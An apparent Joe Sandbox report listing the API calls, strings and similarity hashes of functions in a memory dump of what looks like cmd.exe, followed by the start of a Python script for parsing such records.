• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: ConsoleInfoOutput_close_tellmemset
• String ID:
• API String ID: 1380661413-0
• Opcode ID: 4df18d85fe0d71ddf14ac3e97fa1c49970fa8e7b406d5ab8c4452ac3c8f077a1
• Instruction ID: 9b2510b8cdee8d3a7d04ed07b9898490e5cd02edb92a638014b2847b2f6ba517
• Opcode Fuzzy Hash: 4df18d85fe0d71ddf14ac3e97fa1c49970fa8e7b406d5ab8c4452ac3c8f077a1
• Instruction Fuzzy Hash: F641E670A0038C8BDB34DF29D84836BB7E5AB84318F24692CE995B72A1D730DC45CB52
APIs
• memset.MSVCRT ref: 00EE7F7C
  • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
• GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,-00000001,?,?,00000001), ref: 00EE7FC0
• GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00EE7FF3
• ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,00000001), ref: 00EE800C
• ??_V@YAXPAX@Z.MSVCRT(?), ref: 00EFB05A
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: memset$DriveInformationTypeVolume
• String ID:
• API String ID: 285405857-0
• Opcode ID: bea1164e48a24c48f3ffc4131b80514b1fe758536f2dae22eb469eb573b31b56
• Instruction ID: 9f22d3e6776cc931ad57dc7c8d9f7dacd1ec6688228d5b05a1a43e551ac9dd3e
• Opcode Fuzzy Hash: bea1164e48a24c48f3ffc4131b80514b1fe758536f2dae22eb469eb573b31b56
• Instruction Fuzzy Hash: 14316B71A0024DABDF24DBA5DC84AEF77B9EF08344F04146AE505F2150DB349A44CB21
APIs
  • Part of subcall function 00EE9A11: _get_osfhandle.MSVCRT ref: 00EE9A1C
  • Part of subcall function 00EE9A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00EE793A,00000104,?), ref: 00EE9A2B
  • Part of subcall function 00EE9A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374,-00000001), ref: 00EE9A47
  • Part of subcall function 00EE9A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374), ref: 00EE9A56
  • Part of subcall function 00EE9A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374), ref: 00EE9A61
  • Part of subcall function 00EE9A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04,?,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374,-00000001), ref: 00EE9A6A
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04,?,?,?,00F20AF0,00000002,?,?,00EFA669,%s %s ,?,?,00000000), ref: 00EE99DC
• _get_osfhandle.MSVCRT ref: 00EE99EC
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00EFA669,%s %s ,?,?,00000000), ref: 00EE99F4
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04), ref: 00EE9A09
  • Part of subcall function 00EE9B3B: _get_osfhandle.MSVCRT ref: 00EE9B4E
  • Part of subcall function 00EE9B3B: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00F20AF0,000000FF,00F1A7F0,00002000,00000000,00000000), ref: 00EE9B8E
  • Part of subcall function 00EE9B3B: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00F1A7F0,-00000001,?,00000000), ref: 00EE9BA3
Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4057327938-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 574cf37c0ebf30c0adbf1d417a44ce70708650057afd8eabdf498b5076ab7b0d
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0797660544c7427e82e338d4c57c6d5d6a8a26422706a94dbbbf6bfd38a94625
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 574cf37c0ebf30c0adbf1d417a44ce70708650057afd8eabdf498b5076ab7b0d
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D21DB3230435DABD73566A65D86B7A32D8DB80755F31103EF606F61C3FEA1CC02A155
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EE9B4E
                                                                                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00F20AF0,000000FF,00F1A7F0,00002000,00000000,00000000), ref: 00EE9B8E
                                                                                                                                                                                                                                                                                                                                                      • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00F1A7F0,-00000001,?,00000000), ref: 00EE9BA3
                                                                                                                                                                                                                                                                                                                                                      • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00F20AF0,?,?,00000000), ref: 00EFC0BC
                                                                                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00F20AF0,00001000,00F1A7F0,00002000,00000000,00000000,00F20AEE), ref: 00EFC0DC
                                                                                                                                                                                                                                                                                                                                                      • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00F1A7F0,00000000,?,00000000), ref: 00EFC0FA
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3249344982-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 57dcd1bf5b2c6d40b48e9fcdd8b3eceea9597eb0ea4cd7164a24bd1d1e53b360
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: f7a93e2b4652eb113120796bf3a8ec7a55ea07f879cfa612f81931a2d9f0805c
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57dcd1bf5b2c6d40b48e9fcdd8b3eceea9597eb0ea4cd7164a24bd1d1e53b360
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4321B0B1A4024DBFEB248B65AC49FAB7BBDEB04754F204025F901F21D0E7B09E41D765
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBCA7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: iswspace.MSVCRT ref: 00EEBD1D
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD39
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD5D
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00F075AC
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00F075CB
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00F075F1
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: _wcsicmpwcschr$iswspace
                                                                                                                                                                                                                                                                                                                                                      • String ID: KEYS$LIST$OFF
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3924973218-4129271751
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 88eccfd20094d60d4932e434a93cfdde2b0d91a21ddec188566289ce8d3fd13d
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: b8521aeae236102b55f6fd7b176d9d866a4a13b807a3b3d2a8504d5840c1b719
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 88eccfd20094d60d4932e434a93cfdde2b0d91a21ddec188566289ce8d3fd13d
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B113032E0C7099BD329B726AC4B9B7B3D8EBD0770378405EF502560C0EE55B942F165
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EEDDA3
                                                                                                                                                                                                                                                                                                                                                      • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00EFC050), ref: 00EEDDAD
                                                                                                                                                                                                                                                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00EEDDD6
                                                                                                                                                                                                                                                                                                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04,00000001), ref: 00EEDDE5
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00EEDDF0
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04), ref: 00EEDDF9
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
• String ID:
• API String ID: 513048808-0
• Opcode ID: ef98dceeeb86bd8d7df5358daf159dc80dfac89bac10089ca86711756e0f35d7
• Instruction ID: 3a39dccf8b08beab526878a5a746efd062a255263d18bcf3ab8321f62fa2c414
• Opcode Fuzzy Hash: ef98dceeeb86bd8d7df5358daf159dc80dfac89bac10089ca86711756e0f35d7
• Instruction Fuzzy Hash: C011A93380C29CABD72147BA9D4CBBA37ACE74633DF255315E811F21E0DB754D02AA92
APIs
• _get_osfhandle.MSVCRT ref: 00EE9A1C
• GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00EE793A,00000104,?), ref: 00EE9A2B
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374,-00000001), ref: 00EE9A47
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374), ref: 00EE9A56
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374), ref: 00EE9A61
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04,?,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374,-00000001), ref: 00EE9A6A
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
• String ID:
• API String ID: 513048808-0
• Opcode ID: 3473a84188b777fba57ef37583d349e75bd47a941ef57a79e227a919144ad51e
• Instruction ID: ed8915043f6b597ea62bc9fc6b54c1026a7ab56ad9b02e8f303ae863f4ca689a
• Opcode Fuzzy Hash: 3473a84188b777fba57ef37583d349e75bd47a941ef57a79e227a919144ad51e
• Instruction Fuzzy Hash: CB01A7338040A86B8631577A9C4DD7A36DCDB86738B251335E83EF20D1EA348D036151
APIs
  • Part of subcall function 00EEDCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000), ref: 00EEDCE1
  • Part of subcall function 00EEDCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000,00000000), ref: 00EEDCE8
• memset.MSVCRT ref: 00EFD954
• longjmp.MSVCRT(00F20A70,000000FF,00000000,00F125C2,00F125C0,?,?,?,?,00EED980), ref: 00EFD96D
• memcpy.MSVCRT(?,00000000,00002000,00000000,00F125C2,00F125C0,?,?,?,?,00EED980), ref: 00EFD987
• longjmp.MSVCRT(00F20A70,000000FF,00F125C2,00F125C0,?,?,?,?,00EED980), ref: 00EFD9D3
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: Heaplongjmp$AllocProcessmemcpymemset
• String ID: 0123456789
• API String ID: 2034586978-2793719750
• Opcode ID: 6f98b8a7287efe261dae53f1b6f28587e3cbd84b264e9dcc969c9a74e40d609f
• Instruction ID: 3be794e3025312ae9f0b6209a19cc16bd615d55423f10d2c51951f98518d835b
• Opcode Fuzzy Hash: 6f98b8a7287efe261dae53f1b6f28587e3cbd84b264e9dcc969c9a74e40d609f
• Instruction Fuzzy Hash: 53717A35B0824E8BCB149F69CC457BE77B6EB80304F299069D949F7380EB719E02DB90
APIs
• memset.MSVCRT ref: 00EE5074
  • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
• ??_V@YAXPAX@Z.MSVCRT(?,-00000001), ref: 00EE515F
  • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBCA7
  • Part of subcall function 00EEBC30: iswspace.MSVCRT ref: 00EEBD1D
  • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD39
  • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD5D
• iswspace.MSVCRT ref: 00EF9289
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: wcschr$iswspacememset
• String ID: %s
• API String ID: 2220997661-3043279178
• Opcode ID: 3f35d23999b09feea23ac80a903bf1634ccd0888130054fe43f74b9737c20699
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 60ea1629b6b615e8a2537da95cded4f98755ede0e8d0677bcbf760f6765d9f33
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f35d23999b09feea23ac80a903bf1634ccd0888130054fe43f74b9737c20699
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8513472E0055A9BDB24DFA99C426BBB3F5EF58308F1440ADE989F7241EB309D41CB90
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • RtlCreateUnicodeStringFromAsciiz.NTDLL(?,?), ref: 00F07121
                                                                                                                                                                                                                                                                                                                                                      • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 00F07197
                                                                                                                                                                                                                                                                                                                                                      • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00F071FF
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      • %WINDOWS_COPYRIGHT%, xrefs: 00F07107
                                                                                                                                                                                                                                                                                                                                                      • Copyright (c) Microsoft Corporation. All rights reserved., xrefs: 00F070EE
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                                                                                                                                                                                                                                                                                                      • String ID: %WINDOWS_COPYRIGHT%$Copyright (c) Microsoft Corporation. All rights reserved.
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1103618819-4062316587
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 893a14402843de5f63bd6ba579acd260007984d004acc0ccaa541be2002f0a48
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 75ebcfd24145b358cef1941b8f90a642514e568a4044853ef4589fb25b380642
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 893a14402843de5f63bd6ba579acd260007984d004acc0ccaa541be2002f0a48
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB41D675F0435987CB20EB688C517BA73B1AF48750F6804A9E941EB3D0E675AD43F790
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • CreateSemaphoreExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000001,?,00000000,001F0003,?,?,?,?), ref: 00F02652
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00F02670
                                                                                                                                                                                                                                                                                                                                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00F02694
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$CreateSemaphore
                                                                                                                                                                                                                                                                                                                                                      • String ID: _p0$wil
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4049970386-1814513734
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: c6961765234b48acc2cdd869eebfbec076c33597b07b2c175234612668dcbd5d
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 739261d117b55d8d46d17d5a7241e2870351ac5692626edf8f2a0bb01db7819e
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c6961765234b48acc2cdd869eebfbec076c33597b07b2c175234612668dcbd5d
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE31CE71E402198BCB65DF28CD9DABA73A5AB94320F1401A8E806972C0DE71CE05BB70
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • _wcsnicmp.MSVCRT ref: 00F05295
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF727B: __iob_func.MSVCRT ref: 00EF7280
                                                                                                                                                                                                                                                                                                                                                      • fprintf.MSVCRT ref: 00F05215
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: __iob_func_wcsnicmpfprintf
                                                                                                                                                                                                                                                                                                                                                      • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1828771275-2781220306
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 4d3856257f9add4d0fba05ef776422c4fd7d6268cbf0480e04298138a31bf1d0
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: b9aa504305a72207b95e9dafb2fa781e83c918fc85da0079523c7042b914357f
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d3856257f9add4d0fba05ef776422c4fd7d6268cbf0480e04298138a31bf1d0
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D313032E00619DBDF38DBA59C45A6FB7A5DF54B10B15042DEC0AB32C1EAB05E01FB55
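The per-function records in this listing (API calls with their ref addresses, the dump's Offset, and the Similarity IDs) are more useful once parsed than read by eye. The following is an added example, not code from the Joe Sandbox report or its tooling: it parses two records constructed from this listing, rebases each API reference to an RVA against the dump's Offset (valid here because the dump is marked "based on PE: true"), and indexes records by API name so the same function can be looked up across reports by its API String ID. The record layout it assumes (bulleted sections headed APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity) is taken from this page; treat the parser as an assumption about that layout, not a documented export format.

```python
"""Parse Joe Sandbox per-function records (APIs / Strings / Memory Dump Source /
Similarity) into structured form. Added example, not Joe Sandbox code."""
import re
from dataclasses import dataclass, field

# Constructed sample: two records copied in the layout of this report's listing.
SAMPLE = """\
APIs
• CreateSemaphoreExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000001,?,00000000,001F0003,?,?,?,?), ref: 00F02652
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00F02670
• SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00F02694
Strings
Memory Dump Source
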